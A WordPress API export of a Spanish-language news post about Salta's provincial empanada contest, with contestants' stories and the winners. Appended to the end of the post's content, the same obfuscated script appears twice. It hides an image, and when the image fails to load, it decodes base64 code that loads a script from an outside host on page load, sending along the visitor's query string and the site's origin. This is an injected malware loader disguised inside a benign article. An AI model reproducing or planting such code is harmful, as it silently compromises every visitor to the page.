{"id":2493,"date":"2023-04-12T11:55:02","date_gmt":"2023-04-12T14:55:02","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2493"},"modified":"2025-08-14T00:19:21","modified_gmt":"2025-08-14T03:19:21","slug":"historias-de-vida-en-el-concurso-provincial-de-la-empanada","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2493","title":{"rendered":"<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/historias-de-vida-en-el-concurso-provincial-de-la-empanada-89028\">Historias de vida en el Concurso Provincial de la Empanada<\/a>"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#74132b\"><em>El producto gastron\u00f3mico \u00edcono de Salta tiene como ingrediente principal el amor y la pasi\u00f3n de quienes la producen.<\/em><\/h4>\n\n\n\n<p>\u201cCarnecita picada mano\/fritadita en grasa pella\u201d coplea Bernardo Alarc\u00f3n de San Carlos minutos antes de comenzar la elaboraci\u00f3n de una docena de empanadas salte\u00f1as que fueron evaluadas por un jurado, el del 2do Concurso de la Empanada Salte\u00f1a en el que 37 representantes de los municipios de Salta compitieron por ser los embajadores del producto gastron\u00f3mico ic\u00f3nico de Salta.<\/p>\n\n\n\n<p>El&nbsp;<strong>Ministerio de Turismo y Deportes<\/strong>&nbsp;organiz\u00f3 la final del certamen el 4 de abril, el d\u00eda provincial de la empanada en honor al Gral. Mart\u00edn Miguel de G\u00fcemes quien en 1820 hab\u00eda ordenado que a las tropas que llegaban de Tucum\u00e1n se les sirviese empanadas; hoy emblema de la cocina regional cuya receta atraviesa las generaciones.<\/p>\n\n\n\n<p>\u201cMe vine de tacos altos porque as\u00ed quiero subir al escenario cuando gane\u201d, asegur\u00f3 sonriente Dominga Eugenia Aguilera de El Jard\u00edn y su certeza se cumpli\u00f3; emocionada y feliz subi\u00f3 a recibir su premio, es la nueva Embajadora que participar\u00e1 en acciones de promoci\u00f3n tur\u00edstica.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6590-historias-de-vida-en-el-concurso-provincial-de-la-empanada.JPG\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6590-historias-de-vida-en-el-concurso-provincial-de-la-empanada.JPG\" alt=\"Historias de vida en el Concurso Provincial de la Empanada\"\/><\/a><\/figure>\n\n\n\n<p>Las historias de vida de quienes concursan son m\u00faltiples y este producto acompa\u00f1a etapas de superaci\u00f3n, de emociones y as\u00ed lo reflejan participantes del a\u00f1o pasado. \u201cEste concurso me cambi\u00f3 emocional y econ\u00f3micamente\u201d afirma emocionada Carla, 2do premio de la edici\u00f3n 2022 &nbsp;y fue largamente aplaudida durante el acto de premiaci\u00f3n; los participantes compartieron largos momentos de charla en la que las historias de vida predominaron, de recetas y preparaci\u00f3n no se habla, se honran lo secretos familiares.<\/p>\n\n\n\n<p>&nbsp;\u201cComenc\u00e9 a los 8 a\u00f1os mirando c\u00f3mo lo hac\u00eda mi mam\u00e1\u201d, cuenta Elba Toro de Salvador Mazza, \u201cel primer o el \u00faltimo pueblo, donde comienza la Patria\u201d y agrega \u201cyo sal\u00eda a vender con mi canasto, sal\u00eda de la escuela y mi madre ya me estaba esperando, me cri\u00e9 mirando c\u00f3mo lo hac\u00eda mi mam\u00e1. Es mi sost\u00e9n vivo de eso\u201d, la venta de empanadas como el ingreso del hogar es una historia que se repite, esta mayor\u00eda de mujeres que con sus manos llevan adelante su hogar.&nbsp;<\/p>\n\n\n\n<p>\u201cMe cantaron el cumplecielo\u201d, se emociona Alejandra de Aguaray, el concurso coincide con el cumplea\u00f1os de su hijo \u201cquien este 4 de abril cumplir\u00eda 30; me inici\u00e9 en la cocina hace 8 a\u00f1os como una salida, \u00e9l me trajo aqu\u00ed\u201d y asegura \u201cno vinimos a ganar, vinimos a compartir\u201d; sus afirmaciones despliegan un aspecto esencial del concurso, reunir personas de distintos municipios.<\/p>\n\n\n\n<p>Las historias de vida entrelazadas a la cocina regional circularon durante el concurso en el que los participantes compartieron paseos y tiempo de espera, el Concurso es mucho m\u00e1s que un premio que se gana, es la posibilidad de conocer, de cumplir sue\u00f1os.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"900\" height=\"600\" data-id=\"2494\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/6591-historias-de-vida-en-el-concurso-provincial-de-la-empanada.jpg\" alt=\"\" class=\"wp-image-2494\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/6591-historias-de-vida-en-el-concurso-provincial-de-la-empanada.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/6591-historias-de-vida-en-el-concurso-provincial-de-la-empanada-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/6591-historias-de-vida-en-el-concurso-provincial-de-la-empanada-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/6591-historias-de-vida-en-el-concurso-provincial-de-la-empanada-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/6591-historias-de-vida-en-el-concurso-provincial-de-la-empanada-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"900\" height=\"600\" data-id=\"2495\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/6592-historias-de-vida-en-el-concurso-provincial-de-la-empanada.jpg\" alt=\"\" class=\"wp-image-2495\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/6592-historias-de-vida-en-el-concurso-provincial-de-la-empanada.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/6592-historias-de-vida-en-el-concurso-provincial-de-la-empanada-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/6592-historias-de-vida-en-el-concurso-provincial-de-la-empanada-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/6592-historias-de-vida-en-el-concurso-provincial-de-la-empanada-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/6592-historias-de-vida-en-el-concurso-provincial-de-la-empanada-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Gloria del Valle Aguirre de Chicoana triunfadora en 2022 tambi\u00e9n ofreci\u00f3 su experiencia luego de un a\u00f1o en que fue la m\u00e1xima embajadora de la empanada de Salta: \u201cfue una experiencia muy linda, conoc\u00ed gente de todo el pa\u00eds y tambi\u00e9n del extranjero. En San Pablo, Brasil, ense\u00f1\u00e9 a hacer empanadas; ahora voy a cumplir la promesa que le hice a mi madre Isabel Illescas, voy a abrir mi restaurante. La perd\u00ed hace dos meses, ella tambi\u00e9n fue campeona de comida regional\u201d.<\/p>\n\n\n\n<p>La elaboraci\u00f3n de empanadas es, en muchos casos, un ingreso econ\u00f3mico para sostener la familia, y muchas veces se aprendi\u00f3 en la ni\u00f1ez ayudando a la madre, la recete de la masa y del recado no se comparte, hay secretos que se transmiten de generaci\u00f3n en generaci\u00f3n y degustamos hoy.<\/p>\n\n\n\n<p>Lalo Angelina, miembro del jurado afirma que la empanadera debe ser simp\u00e1tica y aclara que la receta tradicional de la empanada salte\u00f1a no lleva pimiento, tiene como m\u00ednimo 16 repulgues: \u201ces muy cerradito el repulgue, parece un encaje\u201d. &nbsp;<\/p>\n\n\n\n<p>Este a\u00f1o Dominga Eugenia Aguilera de El Jard\u00edn fue la triunfadora y se convirti\u00f3 en embajadora de la provincia y, como tal, acompa\u00f1ar\u00e1 las acciones de promoci\u00f3n que realice el Ministerio de Turismo y Deportes; el 2do premio correspondi\u00f3 a Bernardo Alarc\u00f3n de San Carlos quien llevar\u00e1 sus coplas por el pa\u00eds y en el tercer lugar se ubic\u00f3 Nancy Ordo\u00f1ez de Embarcaci\u00f3n.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6593-historias-de-vida-en-el-concurso-provincial-de-la-empanada.JPG\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6593-historias-de-vida-en-el-concurso-provincial-de-la-empanada.JPG\" alt=\"Historias de vida en el Concurso Provincial de la Empanada\"\/><\/a><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Historias de vida en el Concurso Provincial de la Empanada\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/1JieLqwEOV4?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El producto gastron\u00f3mico \u00edcono de Salta tiene como ingrediente principal el amor y la pasi\u00f3n de quienes la producen. \u201cCarnecita picada mano\/fritadita en grasa pella\u201d coplea Bernardo Alarc\u00f3n de San Carlos minutos antes de comenzar la elaboraci\u00f3n de una docena de empanadas salte\u00f1as que fueron evaluadas por un jurado, el del 2do Concurso de la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2496,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[3],"tags":[],"class_list":{"0":"post-2493","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-gourmet"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2493"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2493"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2493\/revisions"}],"predecessor-version":[{"id":7119,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2493\/revisions\/7119"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2496"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2493"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2493"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2493"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}